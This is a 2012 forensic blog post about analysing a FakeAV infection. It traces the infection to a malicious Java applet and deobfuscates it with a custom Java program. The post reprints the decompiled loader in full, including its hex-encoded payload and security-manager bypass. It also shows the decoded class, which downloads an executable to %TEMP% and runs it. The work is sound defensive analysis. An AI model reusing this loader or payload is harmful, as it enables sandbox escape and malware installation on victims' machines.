Thursday, 9 August 2012

Java Exploit Toolkits - Part 2: Deobfuscating Java Exploit Toolkits

Lets continue with Part 2 of the series on Java Exploit Toolkits. The following post will be a beginners attempt to deobfuscate an obfuscated jar file (what a tongue twister) and I hope that by posting my attempt others may be able to comment on some more efficient ways to conduct this deobfuscation.

The reason why I posted Part 1 of this series was that this particular incident was very similar. It was only due to my experience in my previous incident that I was able to quickly identify artifacts of interest in the incident I will now discuss.

Again I received an image of a machine and was notified that antivirus had detected the following file

 Trojan.FakeAV - C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n  

I immediately noticed the similarity between this incident and my previous incident. I decided to start with the event logs again however in this instance I found one single entry and no tamper protection events as I had in Part 1

 Security Risk Found!Trojan.FakeAV in File: C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.   

I decided that the next logical step would be creating the directory listing and reviewing what occurred around the time of the alert. Reviewing the directory listing I did not find any artifacts of interest. Due to my knowledge of the previous incident I decided to search for .idx files within the directory listing and I found the following

 -A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed  
 -A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx  
 -A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\..  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\.  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\..  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\.  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0  
 -A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\..  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\.  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57  
 -A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245  
 -A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\..  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\.  
 -A------- 2012-08-07 14:38:50.892 2012-08-07 14:38:48.673 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\deployment.properties  
 -A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log  

At this point I wasn't sure whether the following idx files were part of the incident but I decided, based on the previous incident, that they might be a good place to start.

74367697-78280468.idx

bffc1b9-44cf1245.idx

At this point the URLs discovered in these files definitely looked suspicious but I still needed more information to decide. I decided the next step was to start looking at some of the other files that I've highlighted in orange above

74367697-78280468

I exported the file listed above and uploaded it to virus total. Here are the results. Although there were only 3 hits that was enough for me to gather further suspicion of the files. I renamed the file and added the .jar extension and attempted to open this file with jd-gui. Unfortunately I didn't have any success. I also attempted to rename the file to .exe and run it through Anubis but I wasn't able to do that either. At this point I wasn't really sure what my next step could be with the file so I decided to move on and focus on one of the other files. If anybody has any advice on this file i'd be keen to hear what my next steps might be.

bffc1b9-44cf1245

Again I uploaded the file listed above to virus total to confirm any detections. Here are the results. At this point I was fairly sure that I'd identified the initial infection vector. Once again I added the .jar extension to the file and attempted to open it with jd-gui, SUCCESS! Here is the initial view I had when opening the file in jd-gui

I reviewed each of the classes above. The first two basically seemed like obfuscation and padding techniques to avoid antivirus so I decided to spend my time focusing on 03. Below is what I reviewed when opening 03


 import java.lang.reflect.Method;  
 import java.net.URL;  
 import java.security.CodeSource;  
 import java.security.Permissions;  
 import java.security.ProtectionDomain;  
 import java.security.cert.Certificate;  
 class O3 extends ClassLoader  
 {  
  static ProtectionDomain pd;  
  public static char char_at(String paramString, int paramInt)  
  {  
   return paramString.charAt(paramInt);  
  }  
  public static Method get_func(Class paramClass) throws Exception  
  {  
   return paramClass.getClass().getMethod("newInstance", new Class[0]);  
  }  
  public static void invoke(Method paramMethod, Class paramClass) throws Exception  
  {  
   paramMethod.invoke(paramClass, new Object[0]);  
  }  
  public static String get_perm_name()  
  {  
   return new StringBuffer("setSec").toString() + "urityManager";  
  }  
  public static byte[] string_to_bytes(String paramString)  
  {  
   byte[] arrayOfByte = new byte[paramString.length() / 2];  
   try  
   {  
    Permissions localPermissions = new Permissions();  
    localPermissions.add(new RuntimePermission(get_perm_name()));  
    pd = new ProtectionDomain(new CodeSource(new URL(new StringBuffer("file:").toString() + "///"), new Certificate[0]), localPermissions);  
   }  
   catch (Exception localException) {  
   }  
   int i = paramString.length();  
   for (int j = 0; j < i; j += 2)  
   {  
    int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
    k = (k - 3) % 256;  
    arrayOfByte[(j / 2)] = (byte)k;  
   }  
   return arrayOfByte;  
  }  
  public static void load(O3 paramO3)  
  {  
   try  
   {  
    int i = 1;  
    String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };  
    StringBuilder localStringBuilder = new StringBuilder();  
    for (int j = 0; j < arrayOfString.length; j++)  
    {  
     localStringBuilder.append(arrayOfString[j]);  
    }  
    byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
    Class localClass = paramO3.defineClass(null, arrayOfByte, 0, arrayOfByte.length, pd);  
    invoke(get_func(localClass), localClass);  
   }  
   catch (Exception localException)  
   {  
   }  
  }  
 }  

Basically from what I can gather from this Class file was that it creates an array of strings which i've highlighted in red. It then sends this array to the public static byte[] string_to_bytes(String paramString)  method which attempts to deobfuscate the code. At this point I was pretty lost as I wanted to attempt to deobfuscate the string in hope that it might provide me with a better understanding and potentially some new artifacts to search for within my image.

I decided to create my own java application based on the application above. It would be a good chance for me to dust off some of my Java skills that I'd so happily left in the past. I installed the Java JDK and then downloaded the Eclipse IDE which I was familar with.

I created the following Class based on the output of the above, again this is where I'm sure there are more efficient ways of doing this. My aim was to create a text file which listed the deobfuscated text within it. My class is as follows:

 import java.lang.reflect.Method;  
 import java.io.*;  
 public class exploitMain {  
   /**  
    * @param args  
    */  
   public static void main(String[] args) {  
     load();  
   }  
   public static char char_at(String paramString, int paramInt)  
    {  
     return paramString.charAt(paramInt);  
    }  
   public static byte[] string_to_bytes(String paramString)  
    {  
     byte[] arrayOfByte = new byte[paramString.length() / 2];  
     int i = paramString.length();  
     for (int j = 0; j < i; j += 2)  
     {  
      int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
      k = (k - 3) % 256;  
      arrayOfByte[(j / 2)] = (byte)k;  
      //System.out.println(k);  
     }  
     return arrayOfByte;  
    }  
    public static void load()  
    {  
     try  
     {  
       int i = 1;  
       String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };  
       StringBuilder localStringBuilder = new StringBuilder();  
       for (int j = 0; j < arrayOfString.length; j++)  
       {  
        localStringBuilder.append(arrayOfString[j]);  
       }  
       byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
       //System.out.println(arrayOfByte);  
       String temp = new String();  
       temp = bytesToStringUTFCustom(arrayOfByte);  
       writeToText(temp);  
     }  
     catch (Exception localException)  
     {  
     }  
    }  
    public static String bytesToStringUTFCustom(byte[] bytes) {  
      char[] buffer = new char[bytes.length];  
      for(int i=0;i < bytes.length;i++){  
      buffer[i]=(char)bytes[i];  
      }  
      return new String(buffer);  
      }  
    public static void writeToText(String output) throws IOException {  
      File file = new File("c:/output.txt");  
      BufferedWriter bo = new BufferedWriter(new FileWriter(file));  
      bo.write(output);  
      bo.close();  
    }  
 }  

It was rushed so its fairly messy and I haven't commented on it. If you want to know anything further about it please feel free to leave some comments and I'll get back to you as soon as I can. Finally I reviewed my text  file for further information.

 ????  0 ~  
  ' 2  
  3 4  5  
  6 7  8  9  
  6 :  ;  <  =  
  > ?  
        @  
        A  
    B  C  D  E  
    2  F  
  6 G  
    H  I  
    J  
    @  
    K  
    L  M  
  N O  P  Q  R  
    S  
    T  
    T  
  U V  
  U W  X  Y  Z  [   <init>   ()V   Code   LineNumberTable   run   ()Ljava/lang/Object;    
 Exceptions    
 SourceFile   CL4.java  ) *  \  ] ^  'java/security/PrivilegedActionException  _  ` a   http.keepalive   false  b c   java/io/BufferedInputStream   java/net/URL                                                                                                             HTTp://www.XXXXXXX.pro/P4fLBitJ-PxK2/yUA83mE  d  e f  ) g  h i  ) j   java/io/BufferedOutputStream   java/io/FileOutputStream   java/lang/StringBuffer   TEMP  k l  m n   /mor.exe  o f  ) p  q r   00047  s  t u   00116   00120   00074  v w  x *  y  z {  | }   java/lang/Exception   CL4   java/lang/Object  'java/security/PrivilegedExceptionAction   java/security/AccessController   doPrivileged  =(Ljava/security/PrivilegedExceptionAction;)Ljava/lang/Object;   java/lang/System   setSecurityManager   (Ljava/lang/SecurityManager;)V   setProperty  8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;   java/lang/String   trim   ()Ljava/lang/String;   (Ljava/lang/String;)V    
 openStream   ()Ljava/io/InputStream;   (Ljava/io/InputStream;)V   getenv  &(Ljava/lang/String;)Ljava/lang/String;   append  ,(Ljava/lang/String;)Ljava/lang/StringBuffer;   toString   (Ljava/io/OutputStream;I)V   read   ([BII)I   java/lang/Integer   parseInt   (Ljava/lang/String;)I   write   ([BII)V   close   java/lang/Runtime    
 getRuntime   ()Ljava/lang/Runtime;   exec  '(Ljava/lang/String;)Ljava/lang/Process; ! & '   (      ) *   +  >       *?  *?  W?  L?                 ,                               
      - .   +  ?      & ?     ? L = >    ?  W?  Y?      Y   
 ?  ?  ?   
 ?  : ?  Y?  Y?  Y?    ?  ?    ?  ?  ?     ?  :   +    ?  Y=? ?  `> 6    ? x  d  `   ?  ? i  d  ` p?  +  \3  ?  ??T? H  d  ` p ?  +  \3  ?  ??T? ,  d  ` p ?  +  \3  ?  ??T?  +  \3  ?  ??T?  ???  +  ? ??g  ? !  ? "? #:   ?  Y?    ?  ?    ?  ?  ? $W?  L ?       # %   ,  n            
            .   X   g ! k " t $ ? & ? ( ? * ? , ? . ? 0 ? 2 ? 6 ? " ? 9 ? ; ? < ? =   >  C # @ $ D /      %   0    1  


Its difficult to make this output easy to read. I've highlighted the areas of interest in red. In particular it shows an additional file and the URL with the same site we'd previously discovered. Overall I was fairly happy to find an additional artifact to search for which unfortunately I did not  find in this instance.

I hope you find this to be useful and hopefully some of you may comment on more efficient ways of doing what i've done above. Would love to gather any advice from anyone that does this on a more regular basis.








1 comment:

  1. > Its difficult to make this output easy to read

    Wha-ha-ha, obviously, you got another class file as output. Lucky you, it had string constants defined as plain text.

    ReplyDelete